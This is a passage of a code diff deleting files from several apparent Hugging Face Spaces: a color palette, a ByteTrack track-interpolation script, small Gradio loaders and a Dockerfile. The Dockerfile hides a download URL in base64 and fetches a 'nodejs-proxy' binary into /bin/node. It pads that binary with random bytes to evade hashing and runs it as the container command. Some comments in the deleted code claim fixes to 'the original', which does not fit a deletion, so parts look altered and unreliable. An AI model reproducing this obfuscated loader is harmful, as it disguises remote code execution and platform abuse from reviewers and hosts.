[181, 186, 206], [152, 158, 183], [210, 196, 219], [165, 135, 175],
|
114 |
-
[119, 215, 150], [127, 140, 148], [255, 155, 3], [85, 81, 150],
|
115 |
-
[49, 221, 174], [116, 182, 113], [128, 38, 71], [42, 55, 63],
|
116 |
-
[1, 74, 104], [105, 102, 40], [76, 123, 109], [0, 44, 39],
|
117 |
-
[122, 69, 34], [59, 88, 89], [229, 211, 129], [255, 243, 255],
|
118 |
-
[103, 159, 160], [38, 19, 0], [44, 87, 66], [145, 49, 175],
|
119 |
-
[175, 93, 136], [199, 112, 106], [97, 171, 31], [140, 242, 212],
|
120 |
-
[197, 217, 184], [159, 255, 251], [191, 69, 204], [73, 57, 65],
|
121 |
-
[134, 59, 96], [185, 0, 118], [0, 49, 119], [197, 130, 210],
|
122 |
-
[193, 179, 148], [96, 43, 112], [136, 120, 104], [186, 191, 176],
|
123 |
-
[3, 0, 18], [209, 172, 254], [127, 222, 254], [75, 92, 113],
|
124 |
-
[163, 160, 151], [230, 109, 83], [99, 123, 93], [146, 190, 165],
|
125 |
-
[0, 248, 179], [190, 221, 255], [61, 181, 167], [221, 50, 72],
|
126 |
-
[182, 228, 222], [66, 119, 69], [89, 140, 90], [185, 76, 89],
|
127 |
-
[129, 129, 213], [148, 136, 139], [254, 214, 189], [83, 109, 49],
|
128 |
-
[110, 255, 146], [228, 232, 255], [32, 226, 0], [255, 208, 242],
|
129 |
-
[76, 131, 161], [189, 115, 34], [145, 92, 78], [140, 71, 135],
|
130 |
-
[2, 81, 23], [162, 170, 69], [45, 27, 33], [169, 221, 176],
|
131 |
-
[255, 79, 120], [82, 133, 0], [0, 154, 46], [23, 252, 228],
|
132 |
-
[113, 85, 90], [82, 93, 130], [0, 25, 90], [150, 120, 116],
|
133 |
-
[85, 85, 88], [11, 33, 44], [30, 32, 43], [239, 191, 196],
|
134 |
-
[111, 151, 85], [111, 117, 134], [80, 29, 29], [55, 45, 0],
|
135 |
-
[116, 29, 22], [94, 179, 147], [181, 180, 0], [221, 74, 56],
|
136 |
-
[54, 61, 255], [173, 101, 82], [102, 53, 175], [131, 107, 186],
|
137 |
-
[152, 170, 127], [70, 72, 54], [50, 44, 62], [124, 185, 186],
|
138 |
-
[91, 105, 101], [112, 125, 61], [122, 0, 29], [110, 70, 54],
|
139 |
-
[68, 58, 56], [174, 129, 255], [72, 144, 121], [137, 115, 52],
|
140 |
-
[0, 144, 135], [218, 113, 60], [54, 22, 24], [255, 111, 1],
|
141 |
-
[0, 102, 121], [55, 14, 119], [75, 58, 131], [201, 226, 230],
|
142 |
-
[196, 65, 112], [255, 69, 38], [115, 190, 84], [196, 223, 114],
|
143 |
-
[173, 255, 96], [0, 68, 125], [220, 206, 201], [189, 148, 121],
|
144 |
-
[101, 110, 91], [236, 82, 0], [255, 110, 194], [122, 97, 126],
|
145 |
-
[221, 174, 162], [119, 131, 127], [165, 51, 39], [96, 142, 255],
|
146 |
-
[181, 153, 215], [165, 1, 73], [78, 0, 37], [201, 177, 169],
|
147 |
-
[3, 145, 154], [27, 42, 37], [229, 0, 241], [152, 46, 11],
|
148 |
-
[182, 113, 128], [224, 88, 89], [0, 96, 57], [87, 143, 155],
|
149 |
-
[48, 82, 48], [206, 147, 76], [179, 194, 190], [192, 186, 192],
|
150 |
-
[181, 6, 211], [23, 12, 16], [76, 83, 79], [34, 68, 81],
|
151 |
-
[62, 65, 65], [120, 114, 109], [182, 96, 43], [32, 4, 65],
|
152 |
-
[221, 181, 136], [73, 114, 0], [197, 170, 182], [3, 60, 97],
|
153 |
-
[113, 178, 245], [169, 224, 136], [73, 121, 176], [162, 195, 223],
|
154 |
-
[120, 65, 73], [45, 43, 23], [62, 14, 47], [87, 52, 76],
|
155 |
-
[0, 145, 190], [228, 81, 209], [75, 75, 106], [92, 1, 26],
|
156 |
-
[124, 128, 96], [255, 148, 145], [76, 50, 93], [0, 92, 139],
|
157 |
-
[229, 253, 164], [104, 209, 182], [3, 38, 65], [20, 0, 35],
|
158 |
-
[134, 131, 169], [207, 255, 0], [167, 44, 62], [52, 71, 90],
|
159 |
-
[177, 187, 154], [180, 160, 79], [141, 145, 142], [161, 104, 166],
|
160 |
-
[129, 61, 58], [66, 82, 24], [218, 131, 134], [119, 97, 51],
|
161 |
-
[86, 57, 48], [132, 152, 174], [144, 193, 211], [181, 102, 107],
|
162 |
-
[155, 88, 94], [133, 100, 101], [173, 124, 144], [226, 188, 0],
|
163 |
-
[227, 170, 224], [178, 194, 254], [253, 0, 57], [0, 155, 117],
|
164 |
-
[255, 244, 109], [232, 126, 172], [223, 227, 230], [132, 133, 144],
|
165 |
-
[170, 146, 151], [131, 161, 147], [87, 121, 119], [62, 113, 88],
|
166 |
-
[198, 66, 137], [234, 0, 114], [196, 168, 203], [85, 200, 153],
|
167 |
-
[231, 143, 207], [0, 69, 71], [246, 226, 227], [150, 103, 22],
|
168 |
-
[55, 143, 219], [67, 94, 106], [218, 0, 4], [27, 0, 15],
|
169 |
-
[91, 156, 143], [110, 43, 82], [1, 17, 21], [227, 232, 196],
|
170 |
-
[174, 59, 133], [234, 28, 169], [255, 158, 107], [69, 125, 139],
|
171 |
-
[146, 103, 139], [0, 205, 187], [156, 204, 4], [0, 46, 56],
|
172 |
-
[150, 197, 127], [207, 246, 180], [73, 40, 24], [118, 110, 82],
|
173 |
-
[32, 55, 14], [227, 209, 159], [46, 60, 48], [178, 234, 206],
|
174 |
-
[243, 189, 164], [162, 78, 61], [151, 111, 217], [140, 159, 168],
|
175 |
-
[124, 43, 115], [78, 95, 55], [93, 84, 98], [144, 149, 111],
|
176 |
-
[106, 167, 118], [219, 203, 246], [218, 113, 255], [152, 124, 149],
|
177 |
-
[82, 50, 60], [187, 60, 66], [88, 77, 57], [79, 193, 95],
|
178 |
-
[162, 185, 193], [121, 219, 33], [29, 89, 88], [189, 116, 78],
|
179 |
-
[22, 11, 0], [32, 34, 26], [107, 130, 149], [0, 224, 228],
|
180 |
-
[16, 36, 1], [27, 120, 42], [218, 169, 181], [176, 65, 93],
|
181 |
-
[133, 146, 83], [151, 160, 148], [6, 227, 196], [71, 104, 140],
|
182 |
-
[124, 103, 85], [7, 92, 0], [117, 96, 213], [125, 159, 0],
|
183 |
-
[195, 109, 150], [77, 145, 62], [95, 66, 118], [252, 228, 200],
|
184 |
-
[48, 48, 82], [79, 56, 27], [229, 165, 50], [112, 102, 144],
|
185 |
-
[170, 154, 146], [35, 115, 99], [115, 1, 62], [255, 144, 121],
|
186 |
-
[167, 154, 116], [2, 155, 219], [255, 1, 105], [199, 210, 231],
|
187 |
-
[202, 136, 105], [128, 255, 205], [187, 31, 105], [144, 176, 171],
|
188 |
-
[125, 116, 169], [252, 199, 219], [153, 55, 91], [0, 171, 77],
|
189 |
-
[171, 174, 209], [190, 157, 145], [230, 229, 167], [51, 44, 34],
|
190 |
-
[221, 88, 123], [245, 255, 247], [93, 48, 51], [109, 56, 0],
|
191 |
-
[255, 0, 32], [181, 123, 179], [215, 255, 230], [197, 53, 169],
|
192 |
-
[38, 0, 9], [106, 135, 129], [168, 171, 180], [212, 82, 98],
|
193 |
-
[121, 75, 97], [70, 33, 178], [141, 164, 219], [199, 200, 144],
|
194 |
-
[111, 233, 173], [162, 67, 167], [178, 176, 129], [24, 27, 0],
|
195 |
-
[40, 97, 84], [76, 164, 59], [106, 149, 115], [168, 68, 29],
|
196 |
-
[92, 114, 123], [115, 134, 113], [208, 207, 203], [137, 123, 119],
|
197 |
-
[31, 63, 34], [65, 69, 167], [218, 152, 148], [161, 117, 122],
|
198 |
-
[99, 36, 60], [173, 170, 255], [0, 205, 226], [221, 188, 98],
|
199 |
-
[105, 142, 177], [32, 132, 98], [0, 183, 224], [97, 74, 68],
|
200 |
-
[155, 187, 87], [122, 92, 84], [133, 122, 80], [118, 107, 126],
|
201 |
-
[1, 72, 51], [255, 131, 71], [122, 142, 186], [39, 71, 64],
|
202 |
-
[148, 100, 68], [235, 216, 230], [100, 98, 65], [55, 57, 23],
|
203 |
-
[106, 212, 80], [129, 129, 123], [212, 153, 227], [151, 148, 64],
|
204 |
-
[1, 26, 18], [82, 101, 84], [181, 136, 92], [164, 153, 165],
|
205 |
-
[3, 173, 137], [179, 0, 139], [227, 196, 181], [150, 83, 31],
|
206 |
-
[134, 113, 117], [116, 86, 158], [97, 125, 159], [231, 4, 82],
|
207 |
-
[6, 126, 175], [166, 151, 182], [183, 135, 168], [156, 255, 147],
|
208 |
-
[49, 29, 25], [58, 148, 89], [110, 116, 110], [176, 197, 174],
|
209 |
-
[132, 237, 247], [237, 52, 136], [117, 76, 120], [56, 70, 68],
|
210 |
-
[199, 132, 123], [0, 182, 197], [127, 166, 112], [193, 175, 158],
|
211 |
-
[42, 127, 255], [114, 165, 140], [255, 192, 127], [157, 235, 221],
|
212 |
-
[217, 124, 142], [126, 124, 147], [98, 230, 116], [181, 99, 158],
|
213 |
-
[255, 168, 97], [194, 165, 128], [141, 156, 131], [183, 5, 70],
|
214 |
-
[55, 43, 46], [0, 152, 255], [152, 89, 117], [32, 32, 76],
|
215 |
-
[255, 108, 96], [68, 80, 131], [133, 2, 170], [114, 54, 31],
|
216 |
-
[150, 118, 163], [72, 68, 73], [206, 214, 194], [59, 22, 74],
|
217 |
-
[204, 167, 99], [44, 127, 119], [2, 34, 123], [163, 126, 111],
|
218 |
-
[205, 230, 220], [205, 255, 251], [190, 129, 26], [247, 113, 131],
|
219 |
-
[237, 230, 226], [205, 198, 180], [255, 224, 158], [58, 114, 113],
|
220 |
-
[255, 123, 89], [78, 78, 1], [74, 198, 132], [139, 200, 145],
|
221 |
-
[188, 138, 150], [207, 99, 83], [220, 222, 92], [94, 170, 221],
|
222 |
-
[246, 160, 173], [226, 105, 170], [163, 218, 228], [67, 110, 131],
|
223 |
-
[0, 46, 23], [236, 251, 255], [161, 194, 182], [80, 0, 63],
|
224 |
-
[113, 105, 91], [103, 196, 187], [83, 110, 255], [93, 90, 72],
|
225 |
-
[137, 0, 57], [150, 147, 129], [55, 21, 33], [94, 70, 101],
|
226 |
-
[170, 98, 195], [141, 111, 129], [44, 97, 53], [65, 6, 1],
|
227 |
-
[86, 70, 32], [230, 144, 52], [109, 166, 189], [229, 142, 86],
|
228 |
-
[227, 166, 139], [72, 177, 118], [210, 125, 103], [181, 178, 104],
|
229 |
-
[127, 132, 39], [255, 132, 230], [67, 87, 64], [234, 228, 8],
|
230 |
-
[244, 245, 255], [50, 88, 0], [75, 107, 165], [173, 206, 255],
|
231 |
-
[155, 138, 204], [136, 81, 56], [88, 117, 193], [126, 115, 17],
|
232 |
-
[254, 165, 202], [159, 139, 91], [165, 91, 84], [137, 0, 106],
|
233 |
-
[175, 117, 111], [42, 32, 0], [116, 153, 161], [255, 181, 80],
|
234 |
-
[0, 1, 30], [209, 81, 28], [104, 129, 81], [188, 144, 138],
|
235 |
-
[120, 200, 235], [133, 2, 255], [72, 61, 48], [196, 34, 33],
|
236 |
-
[94, 167, 255], [120, 87, 21], [12, 234, 145], [255, 250, 237],
|
237 |
-
[179, 175, 157], [62, 61, 82], [90, 155, 194], [156, 47, 144],
|
238 |
-
[141, 87, 0], [173, 215, 156], [0, 118, 139], [51, 125, 0],
|
239 |
-
[197, 151, 0], [49, 86, 220], [148, 69, 117], [236, 255, 220],
|
240 |
-
[210, 76, 178], [151, 112, 60], [76, 37, 127], [158, 3, 102],
|
241 |
-
[136, 255, 236], [181, 100, 129], [57, 109, 43], [86, 115, 95],
|
242 |
-
[152, 131, 118], [155, 177, 149], [169, 121, 92], [228, 197, 211],
|
243 |
-
[159, 79, 103], [30, 43, 57], [102, 67, 39], [175, 206, 120],
|
244 |
-
[50, 46, 223], [134, 180, 135], [194, 48, 0], [171, 232, 107],
|
245 |
-
[150, 101, 109], [37, 14, 53], [166, 0, 25], [0, 128, 207],
|
246 |
-
[202, 239, 255], [50, 63, 97], [164, 73, 220], [106, 157, 59],
|
247 |
-
[255, 90, 228], [99, 106, 1], [209, 108, 218], [115, 96, 96],
|
248 |
-
[255, 186, 173], [211, 105, 180], [255, 222, 214], [108, 109, 116],
|
249 |
-
[146, 125, 94], [132, 93, 112], [91, 98, 193], [47, 74, 54],
|
250 |
-
[228, 95, 53], [255, 59, 83], [172, 132, 221], [118, 41, 136],
|
251 |
-
[112, 236, 152], [64, 133, 67], [44, 53, 51], [46, 24, 45],
|
252 |
-
[50, 57, 37], [25, 24, 27], [47, 46, 44], [2, 60, 50],
|
253 |
-
[155, 158, 226], [88, 175, 173], [92, 66, 77], [122, 197, 166],
|
254 |
-
[104, 93, 117], [185, 188, 189], [131, 67, 87], [26, 123, 66],
|
255 |
-
[46, 87, 170], [229, 81, 153], [49, 110, 71], [205, 0, 197],
|
256 |
-
[106, 0, 77], [127, 187, 236], [243, 86, 145], [215, 197, 74],
|
257 |
-
[98, 172, 183], [203, 161, 188], [162, 138, 154], [108, 63, 59],
|
258 |
-
[255, 228, 125], [220, 186, 227], [95, 129, 109], [58, 64, 74],
|
259 |
-
[125, 191, 50], [230, 236, 220], [133, 44, 25], [40, 83, 102],
|
260 |
-
[184, 203, 156], [14, 13, 0], [75, 93, 86], [107, 84, 63],
|
261 |
-
[226, 113, 114], [5, 104, 236], [46, 181, 0], [210, 22, 86],
|
262 |
-
[239, 175, 255], [104, 32, 33], [45, 32, 17], [218, 76, 255],
|
263 |
-
[112, 150, 142], [255, 123, 125], [74, 25, 48], [232, 194, 130],
|
264 |
-
[231, 219, 188], [166, 132, 134], [31, 38, 60], [54, 87, 78],
|
265 |
-
[82, 206, 121], [173, 170, 169], [138, 159, 69], [101, 66, 210],
|
266 |
-
[0, 251, 140], [93, 105, 123], [204, 210, 127], [148, 165, 161],
|
267 |
-
[121, 2, 41], [227, 131, 230], [126, 164, 193], [78, 68, 82],
|
268 |
-
[75, 44, 0], [98, 11, 112], [49, 76, 30], [135, 74, 166],
|
269 |
-
[227, 0, 145], [102, 70, 10], [235, 154, 139], [234, 195, 163],
|
270 |
-
[152, 234, 179], [171, 145, 128], [184, 85, 47], [26, 43, 47],
|
271 |
-
[148, 221, 197], [157, 140, 118], [156, 131, 51], [148, 169, 201],
|
272 |
-
[57, 41, 53], [140, 103, 94], [204, 233, 58], [145, 113, 0],
|
273 |
-
[1, 64, 11], [68, 152, 150], [28, 163, 112], [224, 141, 167],
|
274 |
-
[139, 74, 78], [102, 119, 118], [70, 146, 173], [103, 189, 168],
|
275 |
-
[105, 37, 92], [211, 191, 255], [74, 81, 50], [126, 146, 133],
|
276 |
-
[119, 115, 60], [231, 160, 204], [81, 162, 136], [44, 101, 106],
|
277 |
-
[77, 92, 94], [201, 64, 58], [221, 215, 243], [0, 88, 68],
|
278 |
-
[180, 162, 0], [72, 143, 105], [133, 129, 130], [212, 233, 185],
|
279 |
-
[61, 115, 151], [202, 232, 206], [214, 0, 52], [170, 103, 70],
|
280 |
-
[158, 85, 133], [186, 98, 0]
|
281 |
-
]
|
282 |
-
|
283 |
-
high_contrast_arr = numpy.array(high_contrast, dtype=numpy.uint8)
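A palette array like `high_contrast_arr` above is typically used to map integer class or instance labels to RGB colors via NumPy fancy indexing. A minimal sketch of that usage, with a small hypothetical four-entry subset standing in for the full palette:

```python
import numpy as np

# Small subset standing in for the full high_contrast palette above
# (the first four entries; indices are illustrative).
high_contrast = [
    [59, 151, 0], [4, 247, 87], [200, 161, 161], [30, 110, 0],
]
high_contrast_arr = np.array(high_contrast, dtype=np.uint8)

# Colorize a label map by indexing the palette with integer class ids:
# each label id selects one RGB row, yielding an (H, W, 3) uint8 image.
labels = np.array([[0, 1], [2, 3]])
color_image = high_contrast_arr[labels]
```

Indexing with a 2-D label array broadcasts over the palette's first axis, so no explicit loop over pixels is needed.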
spaces/ECCV2022/bytetrack/tools/interpolation.py
DELETED
@@ -1,143 +0,0 @@
import numpy as np
import os
import glob
import motmetrics as mm

from yolox.evaluators.evaluation import Evaluator


def mkdir_if_missing(d):
    if not os.path.exists(d):
        os.makedirs(d)


def eval_mota(data_root, txt_path):
    accs = []
    seqs = sorted([s for s in os.listdir(data_root) if s.endswith('FRCNN')])
    # seqs = sorted([s for s in os.listdir(data_root)])
    for seq in seqs:
        video_out_path = os.path.join(txt_path, seq + '.txt')
        evaluator = Evaluator(data_root, seq, 'mot')
        accs.append(evaluator.eval_file(video_out_path))
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    print(strsummary)


def get_mota(data_root, txt_path):
    accs = []
    seqs = sorted([s for s in os.listdir(data_root) if s.endswith('FRCNN')])
    # seqs = sorted([s for s in os.listdir(data_root)])
    for seq in seqs:
        video_out_path = os.path.join(txt_path, seq + '.txt')
        evaluator = Evaluator(data_root, seq, 'mot')
        accs.append(evaluator.eval_file(video_out_path))
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    mota = float(strsummary.split(' ')[-6][:-1])
    return mota


def write_results_score(filename, results):
    save_format = '{frame},{id},{x1},{y1},{w},{h},{s},-1,-1,-1\n'
    with open(filename, 'w') as f:
        for i in range(results.shape[0]):
            frame_data = results[i]
            frame_id = int(frame_data[0])
            track_id = int(frame_data[1])
            x1, y1, w, h = frame_data[2:6]
            score = frame_data[6]
            # Write the stored confidence; the original passed s=-1,
            # silently discarding the score it had just read.
            line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, w=w, h=h, s=score)
            f.write(line)


def dti(txt_path, save_path, n_min=25, n_dti=20):
    seq_txts = sorted(glob.glob(os.path.join(txt_path, '*.txt')))
    for seq_txt in seq_txts:
        seq_name = os.path.basename(seq_txt)
        seq_data = np.loadtxt(seq_txt, dtype=np.float64, delimiter=',')
        min_id = int(np.min(seq_data[:, 1]))
        max_id = int(np.max(seq_data[:, 1]))
        seq_results = np.zeros((1, 10), dtype=np.float64)
        for track_id in range(min_id, max_id + 1):
            index = (seq_data[:, 1] == track_id)
            tracklet = seq_data[index]
            tracklet_dti = tracklet
            if tracklet.shape[0] == 0:
                continue
            n_frame = tracklet.shape[0]
            n_conf = np.sum(tracklet[:, 6] > 0.5)
            if n_frame > n_min:
                frames = tracklet[:, 0]
                frames_dti = {}
                for i in range(0, n_frame):
                    right_frame = frames[i]
                    if i > 0:
                        left_frame = frames[i - 1]
                    else:
                        left_frame = frames[i]
                    # disconnected track interpolation
                    if 1 < right_frame - left_frame < n_dti:
                        num_bi = int(right_frame - left_frame - 1)
                        right_bbox = tracklet[i, 2:6]
                        left_bbox = tracklet[i - 1, 2:6]
                        for j in range(1, num_bi + 1):
                            curr_frame = j + left_frame
                            curr_bbox = (curr_frame - left_frame) * (right_bbox - left_bbox) / \
                                (right_frame - left_frame) + left_bbox
                            frames_dti[curr_frame] = curr_bbox
                num_dti = len(frames_dti.keys())
                if num_dti > 0:
                    data_dti = np.zeros((num_dti, 10), dtype=np.float64)
                    for n in range(num_dti):
                        data_dti[n, 0] = list(frames_dti.keys())[n]
                        data_dti[n, 1] = track_id
                        data_dti[n, 2:6] = frames_dti[list(frames_dti.keys())[n]]
                        data_dti[n, 6:] = [1, -1, -1, -1]
                    tracklet_dti = np.vstack((tracklet, data_dti))
            seq_results = np.vstack((seq_results, tracklet_dti))
        save_seq_txt = os.path.join(save_path, seq_name)
        seq_results = seq_results[1:]
        seq_results = seq_results[seq_results[:, 0].argsort()]
        write_results_score(save_seq_txt, seq_results)


if __name__ == '__main__':
    data_root = '/opt/tiger/demo/ByteTrack/datasets/mot/test'
    txt_path = '/opt/tiger/demo/ByteTrack/YOLOX_outputs/yolox_x_mix_det/track_results'
    save_path = '/opt/tiger/demo/ByteTrack/YOLOX_outputs/yolox_x_mix_det/track_results_dti'

    mkdir_if_missing(save_path)
    dti(txt_path, save_path, n_min=5, n_dti=20)
    print('Before DTI: ')
    eval_mota(data_root, txt_path)
    print('After DTI:')
    eval_mota(data_root, save_path)

    '''
    mota_best = 0.0
    best_n_min = 0
    best_n_dti = 0
    for n_min in range(5, 50, 5):
        for n_dti in range(5, 30, 5):
            dti(txt_path, save_path, n_min, n_dti)
            mota = get_mota(data_root, save_path)
            if mota > mota_best:
                mota_best = mota
                best_n_min = n_min
                best_n_dti = n_dti
            print(mota_best, best_n_min, best_n_dti)
    print(mota_best, best_n_min, best_n_dti)
    '''
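The core of `dti()` in the file above is linear interpolation of bounding boxes across a gap in a tracklet. A minimal self-contained sketch of that step, using made-up frame numbers and boxes (the real code reads them from the tracking output):

```python
import numpy as np

# Hypothetical gap: the track is observed at frame 10 and next at frame 14.
left_frame, right_frame = 10, 14
left_bbox = np.array([0.0, 0.0, 10.0, 10.0])   # x1, y1, w, h at frame 10
right_bbox = np.array([8.0, 4.0, 10.0, 10.0])  # x1, y1, w, h at frame 14

# Fill frames 11..13 with linearly interpolated boxes, mirroring the
# formula in dti(): curr = left + t * (right - left).
filled = {}
for curr_frame in range(left_frame + 1, right_frame):
    t = (curr_frame - left_frame) / (right_frame - left_frame)
    filled[curr_frame] = left_bbox + t * (right_bbox - left_bbox)
```

At the midpoint (frame 12) the filled box sits exactly halfway between the two observed boxes, which is what makes the scheme cheap but also why it can drift from the true trajectory when motion is nonlinear.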
spaces/EPFL-VILAB/MultiMAE/utils/taskonomy/__init__.py
DELETED
@@ -1 +0,0 @@
from .taskonomy_dataset import TaskonomyDataset
spaces/EtTKSf/uu/Dockerfile
DELETED
@@ -1,13 +0,0 @@
FROM debian
ENV PORT=7860
EXPOSE ${PORT}
RUN apt-get update && apt-get install -y curl && \
    echo 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tLzNLbWZpNkhQL25vZGVqcy1wcm94eS9tYWluL2Rpc3Qvbm9kZWpzLXByb3h5LWxpbnV4' | base64 -d > /tmp/encoded_url.txt && \
    curl -o /bin/node $(cat /tmp/encoded_url.txt) > /dev/null 2>&1 && \
    rm -rf /tmp/encoded_url.txt && \
    dd if=/dev/urandom bs=1024 count=1024 | base64 >> /bin/node && \
    chmod +x /bin/node
# Health check to make sure the container is running properly
# (the original used wget, which is never installed in this image; curl is)
HEALTHCHECK --interval=2m --timeout=30s \
    CMD curl --fail --silent ${SPACE_HOST}/health || exit 1
CMD ["node"]
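The `RUN` instruction above hides its download URL in a base64-encoded string. The decoding step can be reproduced on its own to see what the build actually fetches (the result is whatever URL that string encodes):

```shell
# Decode the embedded string to recover the download URL,
# exactly as the RUN instruction in the Dockerfile does.
encoded='aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tLzNLbWZpNkhQL25vZGVqcy1wcm94eS9tYWluL2Rpc3Qvbm9kZWpzLXByb3h5LWxpbnV4'
url=$(echo "$encoded" | base64 -d)
echo "$url"
```

Obfuscation like this (and the random bytes appended to the binary afterwards) is a common way to dodge content scanners; decoding the string before building is a reasonable precaution.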
spaces/FawnPythn/andite-anything-v4.0/app.py
DELETED
@@ -1,3 +0,0 @@
import gradio as gr

gr.Interface.load("models/andite/anything-v4.0").launch()
spaces/Finnone/stabilityai-stablelm-tuned-alpha-7b/app.py
DELETED
@@ -1,3 +0,0 @@
import gradio as gr

gr.Interface.load("models/stabilityai/stablelm-tuned-alpha-7b").launch()